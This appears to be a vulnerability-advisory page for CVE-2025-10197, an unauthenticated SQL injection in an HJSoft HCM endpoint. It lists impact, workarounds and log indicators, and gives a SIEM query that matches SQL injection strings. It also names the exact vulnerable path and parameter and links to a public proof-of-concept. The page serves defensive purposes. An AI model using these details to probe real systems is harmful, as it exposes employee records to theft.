CVE-2025-10197
📋 TL;DR
This CVE describes a SQL injection vulnerability in HJSoft HCM Human Resources Management System. Attackers can manipulate the ID parameter in the /templates/attestation/../../selfservice/lawresource/downlawbase endpoint to execute arbitrary SQL commands. Organizations using affected versions of HJSoft HCM are vulnerable to data theft and system compromise.
💻 Affected Systems
- HJSoft HCM Human Resources Management System
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Complete database compromise leading to theft of sensitive HR data (employee records, salaries, personal information), system takeover, and lateral movement within the network.
Likely Case
Data exfiltration of HR information, potential credential theft, and database manipulation.
If Mitigated
Limited impact due to proper input validation, parameterized queries, and network segmentation preventing database access.
🎯 Exploit Status
Exploit details are publicly available on GitHub. Remote exploitation is possible without authentication.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Unknown
Vendor Advisory: None available
Restart Required: No
Instructions:
Contact HJSoft for patch information. No official patch or advisory has been released as vendor did not respond to disclosure.
🔧 Temporary Workarounds
Web Application Firewall (WAF) Rules
allImplement WAF rules to block SQL injection patterns targeting the vulnerable endpoint
Network Access Control
allRestrict access to the vulnerable endpoint using network ACLs or firewall rules
🧯 If You Can't Patch
- Implement input validation and parameterized queries in the application code
- Deploy a web application firewall with SQL injection protection rules
🔍 How to Verify
Check if Vulnerable:
Test the endpoint /templates/attestation/../../selfservice/lawresource/downlawbase with SQL injection payloads in the ID parameterCheck Version:
Check HJSoft HCM version in administration panel or configuration filesVerify Fix Applied:
Verify that SQL injection attempts no longer succeed and that input validation is properly implemented📡 Detection & Monitoring
Log Indicators:
- Unusual database queries from web server logs
- Multiple failed SQL injection attempts in application logs
- Access to the downlawbase endpoint with suspicious parameters
Network Indicators:
- SQL error messages in HTTP responses
- Unusual database connection patterns from web servers
SIEM Query:
source="web_logs" AND (uri="*downlawbase*" AND (param="*ID=*" AND (content="*' OR *" OR content="*UNION*" OR content="*SELECT*")))🔗 References
- https://github.com/eeeeeekkkkkkkk/POC/blob/main/%E5%AE%8F%E6%99%AFHCM%20%E4%BA%BA%E5%8A%9B%E8%B5%84%E6%BA%90%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9Fdownlawbase%E6%8E%A5%E5%8F%A3%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
- https://vuldb.com/?ctiid.323236
- https://vuldb.com/?id.323236
- https://vuldb.com/?submit.639745
